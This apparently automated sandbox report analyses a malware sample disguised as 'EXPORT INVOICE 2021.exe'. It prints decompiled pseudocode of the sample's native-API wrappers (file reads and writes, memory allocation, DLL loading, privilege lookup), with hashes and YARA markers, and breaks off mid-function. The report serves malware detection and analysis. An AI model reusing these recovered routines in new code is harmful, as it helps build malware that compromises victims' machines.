                        Reset < >

                          Analysis Process: EXPORT INVOICE 2021.exe PID: 5548 Parent PID: 7128 EXPORT INVOICE 2021.exeCOMMON

                          Executed Functions

                          Function 0041868A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38filenativeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 23%
                          			E0041868A(void* __eax, void* __ecx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, char _a28, intOrPtr _a32, char _a36) {
				intOrPtr _v0;
				void* _t21;
				void* _t31;
				void* _t32;
				intOrPtr* _t33;
				void* _t35;

				asm("lock repne cmp [ebp-0x75], dl");
				_t16 = _v0;
				_t33 = _v0 + 0xc48;
				E004191E0(_t31, _t16, _t33,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a);
				_t6 =  &_a36; // 0x413a31
				_t8 =  &_a28; // 0x413d72
				_t14 =  &_a4; // 0x413d72
				_t21 =  *((intOrPtr*)( *_t33))( *_t14, _a8, _a12, _a16, _a20, _a24,  *_t8, _a32,  *_t6, _t32, _t35, __ecx); // executed
				return _t21;
			}









                          0x0041868d
                          0x00418693
                          0x0041869f
                          0x004186a7
                          0x004186ac
                          0x004186b2
                          0x004186cd
                          0x004186d5
                          0x004186d9

                          APIs
                          • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: FileRead
                          • String ID: 1:A$r=A$r=A
                          • API String ID: 2738559852-4243674446
                          • Opcode ID: 05e16dbf297fb35669510ccc9d9226cbb0262701a466df6edae6169f8ef02e99
                          • Instruction ID: 863b7e6112ade0fb5781b349674e74d46b7244ed055e11297cfcebfcc1325b12
                          • Opcode Fuzzy Hash: 05e16dbf297fb35669510ccc9d9226cbb0262701a466df6edae6169f8ef02e99
                          • Instruction Fuzzy Hash: 36F0E7B6200109AFDB14CF99DC90EEB77A9AF8C354F15824DFA4DA7241C630E851CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00418690, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 37%
                          			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a31
				_t6 =  &_a32; // 0x413d72
				_t12 =  &_a8; // 0x413d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                          0x00418693
                          0x0041869f
                          0x004186a7
                          0x004186ac
                          0x004186b2
                          0x004186cd
                          0x004186d5
                          0x004186d9

                          APIs
                          • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: FileRead
                          • String ID: 1:A$r=A$r=A
                          • API String ID: 2738559852-4243674446
                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                          • Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                          • Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00409B40(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF70( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B390(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B610( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419720(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                          0x00409b5c
                          0x00409b5f
                          0x00409b64
                          0x00409b69
                          0x00409b73
                          0x00409b78
                          0x00409b7b
                          0x00409b7d
                          0x00409b85
                          0x00409b8a
                          0x00409b8a
                          0x00409b91
                          0x00409b99
                          0x00409b9c
                          0x00409b9e
                          0x00409bb2
                          0x00000000
                          0x00409bb4
                          0x00409bba
                          0x00409b6e
                          0x00409b6e
                          0x00409b6e

                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                          • Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
                          • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                          • Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004185E0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004185E0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                          0x004185ef
                          0x004185f7
                          0x0041862d
                          0x00418631

                          APIs
                          • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                          • Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                          • Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004187BB, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004187BB(void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
				intOrPtr _v0;
				long _t14;
				void* _t22;

				_t10 = _v0;
				_t3 = _t10 + 0xc60; // 0xca0
				E004191E0(_t22, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t14;
			}






                          0x004187c3
                          0x004187cf
                          0x004187d7
                          0x004187f9
                          0x004187fd

                          APIs
                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID:
                          • API String ID: 2167126740-0
                          • Opcode ID: 1ab72b5845657cf83c92f77d3c1a0af178ce6736a0a269ead4959d4c033d9a62
                          • Instruction ID: 36f539910dfcd5c58d1c61f3a79fcbecc9ec82b097138f640fba49c409ab0b4b
                          • Opcode Fuzzy Hash: 1ab72b5845657cf83c92f77d3c1a0af178ce6736a0a269ead4959d4c033d9a62
                          • Instruction Fuzzy Hash: BEF0F8B2200209ABDB14DF89DC91EA777ADAF88754F158559FA0997241CA31F910CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004187C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004187C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                          0x004187cf
                          0x004187d7
                          0x004187f9
                          0x004187fd

                          APIs
                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID:
                          • API String ID: 2167126740-0
                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                          • Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                          • Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0041870A, Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 50%
                          			E0041870A(void* _a4) {
				intOrPtr _v0;
				long _t8;
				void* _t11;

				asm("cli");
				asm("rcl dword [ecx], 1");
				asm("in eax, dx");
				_push(_t15);
				_t5 = _v0;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409763
				E004191E0(_t11, _v0, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a4); // executed
				return _t8;
			}






                          0x0041870a
                          0x0041870b
                          0x0041870e
                          0x00418710
                          0x00418713
                          0x00418716
                          0x0041871f
                          0x00418727
                          0x00418735
                          0x00418739

                          APIs
                          • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: 8b87c2ac9614acf8a8a910659458023948e6e8d63002bb762abb57571a7a8967
                          • Instruction ID: cf046a089a4a4ba12468b9f37bd59f221906906f4bc0993f6522a68de848ecdd
                          • Opcode Fuzzy Hash: 8b87c2ac9614acf8a8a910659458023948e6e8d63002bb762abb57571a7a8967
                          • Instruction Fuzzy Hash: 76E08C32200214BBE710EB98CC89EA777A8EF84750F154099FA099B242C630FA00C6E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00418710, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00418710(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409763
				E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                          0x00418713
                          0x00418716
                          0x0041871f
                          0x00418727
                          0x00418735
                          0x00418739

                          APIs
                          • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                          • Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                          • Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004088D0, Relevance: .1, Instructions: 92COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                          • Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
                          • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                          • Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040722E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66threadwindowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 37%
                          			E0040722E(void* __eflags, void* _a8, void* _a12) {
				void* _v63;
				void* _v64;

				asm("std");
				if (__eflags <= 0) goto L6;
			}





                          0x0040722e
                          0x0040722f

                          APIs
                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID: 3333
                          • API String ID: 1836367815-2924271548
                          • Opcode ID: b3df3592349cd276e6919780e5d7b6477f3e1924f2f70233eb65d4e31a55c4bb
                          • Instruction ID: 3221536e43fa41ddc95d344dc140e81d4f56a2eb69e6c9dede7f6524b89c5477
                          • Opcode Fuzzy Hash: b3df3592349cd276e6919780e5d7b6477f3e1924f2f70233eb65d4e31a55c4bb
                          • Instruction Fuzzy Hash: FA110031A412197BD724AA959C42FFF775C5F40725F08406EFE04BA2C1D6AC7D0143EA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004188B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                          0x004188c7
                          0x004188d2
                          0x004188dd
                          0x004188e1

                          APIs
                          • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID: 65A
                          • API String ID: 1279760036-2085483392
                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                          • Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                          • Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 82%
                          			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* __esi;
				void* _t12;
				int _t13;
				void* _t16;
				long _t21;
				int _t26;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E0041A140( &_v67, 0, 0x3f);
				E0041AD20( &_v68, 3);
				_t25 = _a4 + 0x1c;
				_t12 = E00409B40(_t32, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E50(_t16, _a4 + 0x1c, _t25, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_t21 = _a8;
					_t13 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t34 = _t13;
					if(_t13 == 0) {
						_t13 =  *_t26(_t21, 0x8003, _t28 + (E004092A0(_t34, 1, 8) & 0x000000ff) - 0x40, _t13);
					}
				}
				return _t13;
			}













                          0x00407280
                          0x0040728f
                          0x00407293
                          0x0040729e
                          0x004072aa
                          0x004072ae
                          0x004072be
                          0x004072c3
                          0x004072ca
                          0x004072cd
                          0x004072da
                          0x004072dc
                          0x004072de
                          0x004072fb
                          0x004072fb
                          0x004072fd
                          0x00407302

                          APIs
                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID:
                          • API String ID: 1836367815-0
                          • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                          • Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
                          • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                          • Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004188E4, Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 37%
                          			E004188E4(void* __eax, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t12;
				void* _t17;

				asm("daa");
				asm("salc");
				asm("sbb esi, ecx");
				asm("jecxz 0xfffffffd");
				asm("fist word [ebp-0x75]");
				_t9 = _a4;
				_t3 = _t9 + 0xc74; // 0xc74
				E004191E0(_t17, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t12;
			}





                          0x004188e9
                          0x004188ea
                          0x004188eb
                          0x004188ed
                          0x004188ef
                          0x004188f3
                          0x004188ff
                          0x00418907
                          0x0041891d
                          0x00418921

                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: 679fb26225b5836e06c650b8363c4d5cdae22b0eef25890a51f461be66bc441f
                          • Instruction ID: 5741dbaff4d45bc9ff6c6f05fccc036b78a0c439ac3fc0f2395c6169e7b6e330
                          • Opcode Fuzzy Hash: 679fb26225b5836e06c650b8363c4d5cdae22b0eef25890a51f461be66bc441f
                          • Instruction Fuzzy Hash: B4E0EDB1610505BBCB28DF64CC49ED737A8EF48340F004A69F90CA7201DA31E900CAA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004188F0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004188F0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                          0x004188ff
                          0x00418907
                          0x0041891d
                          0x00418921

                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                          • Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                          • Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00418A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00418A50(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                          0x00418a6a
                          0x00418a80
                          0x00418a84

                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: LookupPrivilegeValue
                          • String ID:
                          • API String ID: 3899507212-0
                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                          • Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                          • Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00418926, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                          Download Yara Rule
                          C-Code - Quality: 58%
                          			E00418926(char _a1, intOrPtr _a4, int _a8) {
				void* _v1;
				void* _t7;
				void* _t15;

				asm("adc al, 0x47");
				 *(_t7 + 0x18) =  *(_t7 + 0x18) | 0x0000009c;
				_push( &_a1);
				_t9 = _a4;
				E004191E0(_t15, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t9 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}






                          0x00418928
                          0x0041892b
                          0x00418930
                          0x00418933
                          0x0041894a
                          0x00418958

                          APIs
                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID:
                          • API String ID: 621844428-0
                          • Opcode ID: a28dd54e0cf036636fff4c847ab9ce0a043c12db314b348e8ab5a616d2cb215d
                          • Instruction ID: 068044b55d5dd6f4c2aa8c79dcb8c065914c003a5fb493ea675d9c06e6f50c75
                          • Opcode Fuzzy Hash: a28dd54e0cf036636fff4c847ab9ce0a043c12db314b348e8ab5a616d2cb215d
                          • Instruction Fuzzy Hash: D1E08CB16602087BD324DF54CCCAED33BA8EF09790F058568F9196F252D530EB41CAE1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00418930, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00418930(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191E0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                          0x00418933
                          0x0041894a
                          0x00418958

                          APIs
                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID:
                          • API String ID: 621844428-0
                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                          • Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                          • Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 00408C3A, Relevance: 1.7, Strings: 1, Instructions: 432COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00408C3A(void* __edi, void* __esi, void* __eflags, void* _a4, void* _a8) {
				void* _v4;
				void* _v8;
				void* _v12;
				void* _v300;
				void* _t459;
				void* _t493;

				_t493 = __esi;
				_t459 = __edi;
				if (__eflags >= 0) goto L5;
			}









                          0x00408c3a
                          0x00408c3a
                          0x00408c3f

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: (
                          • API String ID: 0-3887548279
                          • Opcode ID: 8b922e96c2e34380d8955b6c0daa1b1354b16ed608a272457cf994f506a3e40d
                          • Instruction ID: e98584b6a969376ca4f8e28c166adcbd1ad1052a18dba8af672dbdd05d5e1801
                          • Opcode Fuzzy Hash: 8b922e96c2e34380d8955b6c0daa1b1354b16ed608a272457cf994f506a3e40d
                          • Instruction Fuzzy Hash: 34121DB6E006189FDB14CF9AD48059DFBF2FF88314F1AC1AAD849A7355D774AA418F80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00408C80, Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E00408C80(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed int* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t400;
				signed int _t405;
				signed int _t411;
				signed int _t414;
				signed int _t421;
				signed int _t424;
				signed int _t433;
				signed int _t435;
				signed int _t438;
				signed int _t446;
				signed int _t448;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
